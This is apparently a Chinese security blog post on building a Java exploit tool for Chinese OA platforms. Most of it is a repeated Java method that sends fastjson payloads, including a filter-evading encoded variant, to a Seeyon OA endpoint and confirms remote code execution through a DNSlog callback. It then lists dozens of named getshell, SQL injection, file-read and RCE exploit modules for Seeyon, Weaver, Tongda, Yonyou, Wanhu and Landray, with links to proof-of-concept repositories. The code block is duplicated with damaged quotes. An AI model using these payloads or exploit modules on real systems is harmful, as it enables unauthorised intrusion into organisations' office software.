Java_OAexp工具设计及实现 | 技术精选0132
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
public boolean VULcheck(Stringurl) throwsException { this.target= url; String path = url +VULURL; //获取dnslogdomian String dnslog =DnslogDomain(); if(dnslog.equals("请检查网络")){ this.isVul= false; }else{ try{ Map<String,String> Headers =new HashMap<String,String>(); Headers.put("Content-Type","application/x-www-form-urlencoded"); Headers.put("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131Safari/537.36"); Headers.put("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"); Headers.put("Connection","close"); String data ="_json_params={\"@type\":\"java.net.Inet4Address\",\"val\":\""+ dnslog.split(",")[1]+ "\"}"; String data2 ="_json_params={\"%40type\":\"java\\x2enet\\x2eInet4Address\",\"val\":\""+ dnslog.split(",")[1]+ "\"}"; HttpRequest result =HttpRequest.post(path).headers(Headers).send(data).followRedirects(false).readTimeout(5000); HttpRequest result2 =HttpRequest.post(path).headers(Headers).send(data2).followRedirects(false).readTimeout(5000); String ress =result.body(); String ress2 =result2.body(); System.out.println(ress); System.out.println(ress2); //获取dnslog记录 String getrecords =DnslogRecords(dnslog.split(",")[0]); if(getrecords.contains(dnslog.split(",")[1])){ this.isVul= true; } return this.isVul; } catch(Exception e){ System.out.println(e); throw e; } } return this.isVul; }
this.target= url;
String path = url +VULURL;
//获取dnslogdomian
String dnslog =DnslogDomain();
if(dnslog.equals(“请检查网络”)){
this.isVul= false;
}else{
try{
Map<String,String> Headers =new HashMap<String,String>();
Headers.put(“Content-Type”,”application/x-www-form-urlencoded”);
Headers.put(“User-Agent”,”Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131Safari/537.36″);
Headers.put(“Accept”,”text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9″);
Headers.put(“Connection”,”close”);
String data =”_json_params={\”@type\”:\”java.net.Inet4Address\”,\”val\”:\””+ dnslog.split(“,”)[1]+ “\”}”;
String data2 =”_json_params={\”%40type\”:\”java\\x2enet\\x2eInet4Address\”,\”val\”:\””+ dnslog.split(“,”)[1]+ “\”}”;
HttpRequest result =HttpRequest.post(path).headers(Headers).send(data).followRedirects(false).readTimeout(5000);
HttpRequest result2 =HttpRequest.post(path).headers(Headers).send(data2).followRedirects(false).readTimeout(5000);
String ress =result.body();
String ress2 =result2.body();
System.out.println(ress);
System.out.println(ress2);
//获取dnslog记录
String getrecords =DnslogRecords(dnslog.split(“,”)[0]);
if(getrecords.contains(dnslog.split(“,”)[1])){
this.isVul= true;
}
return this.isVul;
} catch(Exception e){
System.out.println(e);
throw e;
}
}
return this.isVul;
}
this.target= url;
String path = this.target+ VULURL;
//获取dnslogdomian
String dnslog =DnslogDomain();
System.out.println(dnslog);
if(dnslog.equals(“请检查网络”)){
this.isVul= false;
}else{
try{
Map<String,String>Headers=newHashMap<String,String>();
Headers.put(“Content-Type”,”application/x-www-form-urlencoded”);
Headers.put(“User-Agent”,”Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/92.0.4515.131 Safari/537.36″);
Headers.put(“Accept”,”text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9″);
Headers.put(“Connection”,”close”);
String data =”_json_params={\”@type\”:\”java.net.Inet4Address\”,\”val\”:\””+ dnslog.split(“,”)[1]+ “\”}”;
String data2 =”_json_params={\”%40type\”:\”java\\x2enet\\x2eInet4Address\”,\”val\”:\””+ dnslog.split(“,”)[1]+ “\”}”;
HttpRequest result =HttpRequest.post(path).headers(Headers).send(data).followRedirects(false).readTimeout(5000);
HttpRequest result2 =HttpRequest.post(path).headers(Headers).send(data2).followRedirects(false).readTimeout(5000);
String ress =result.body();
String ress2 =result2.body();
System.out.println(ress);
System.out.println(ress2);
//获取dnslog记录
String getrecords =DnslogRecords(dnslog.split(“,”)[0]);
String dnsdomain = “原始dnsdomain_host:” +dnslog.split(“,”)[1];
String dnsrecords =”结果dnsrecords_value:” +getrecords;
if(getrecords.contains(dnslog.split(“,”)[1])){
returnpath + “存在致远OAfastjson rce \n”+ dnsdomain +”\n”+dnsrecords;
}
return path +”不存在致远OAfastjson rce \n”+ dnsdomain +”\n”+dnsrecords;
} catch(Exception e){
System.out.println(e);
throw e;
}
}
return path +”请检查网络”;
}
1、SeeyonOA_Session_Divulge_Upload_Getshell
2、SeeyonOA_Fastjson_SursenServlet_Rce
3、SeeyonOA_Fastjson_ChangeLocale_Rce
4、SeeyonOA_ajaxAction_Upload_GetShell
5、SeeyonOA_A8_Htmlofficeservlet_Rce
6、SeeyonOA_A6_InitDataAssess_Divulge
7、SeeyonOA_A6_Setextno_Sqlinjection
8、SeeyonOA_A6_DownExcelBeanServlet
9、SeeyonOA_A6_CreateMysql_Divulge
10、SeeyonOA_GetSessionList_Divulge
11、SeeyonOA_Webmail_FileDownLoad
12、SeeyonOA_Session_Divulge
13、SeeyonOA_A8_Information
泛微
1、WeaverOA_E_Cology_getSqlData_SqInjection
2、WeaverOA_E_Cology_LoginSSO_Sqlinjection
3、WeaverOA_E_cology_WorkflowServiceXml_Rce
4、WeaverOA_Weaver_common_Ctrl_FileUpload
5、WeaverOA_E_Office_Upload_Getshell
6、WeaverOA_E_Cology_DBconfigReader
7、WeaverOA_Mysql_config_Information
8、WeaverOA_E_Bridge_任意文件读取
9、WeaverOA_V9_Upload_Getshell
10、WeaverOA_E_Mobile_Ongl_Rce
11、WeaverOA_V8_Sqlinjection
12、WeaverOA_BshServlet_Rce
1、TongdaOA_Attachment_remark_FileInclude
2、TongdaOA_Management_Upload_Getshell
3、TongdaOA_Delete_Authincphp_Getshell
4、TongdaOA_Api_Ali_Upload_Getshell
5、TongdaOA_Ispirit_Upload_Getshell
6、TongdaOA_Report_Bi_Sqlnjection
7、TongdaOA_Swfupload_Sqlnjection
8、TongdaOA_File_Include_Getshell
9、TongdaOA_Get_Contactlist
10、TongdaOA_AnyUser_Login
用友
1、Yongyon_BshServlet_DatabaseDecode
2、YongYou_NCCloudFS_Sqlinjection
3、YongYou_ERP_NC_DirTraversal
4、YongYou_U8_Rce_Sqlinjection
5、Yongyon_U8_getSessionList
6、YongYou_NC_Uapws_XXE
7、YongYou_U8_Sqlinjection
8、Yongyon_EF_DirTraversal
9、YongYou_BshServlet_Rce
万户
1、WanhuOA_FileUpload_Controller_Getshell
2、WanhuOA_showResult_Sqlinjection
3、WanhuOA_Download_http_Filedown
4、WanhuOA_Download_old_Filedown
5、WanhuOA_Download_ftp_Filedown
6、WanhuOA_smartUpload_Getshell
蓝凌
1、LandrayOA_Custom_SSRF_JNDI
2、LandrayOA_sysSearchMain_Rce
3、LandrayOA_Custom_FileRead
http://wiki.peiqi.tech/wiki/oa/
https://github.com/f0ng/poc2jar
https://github.com/xinyu2428/TDOA_RCE
https://github.com/yhy0/ExpDemo-JavaFX
https://www.cnblogs.com/fsqsec/p/5501657.html
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/4426.html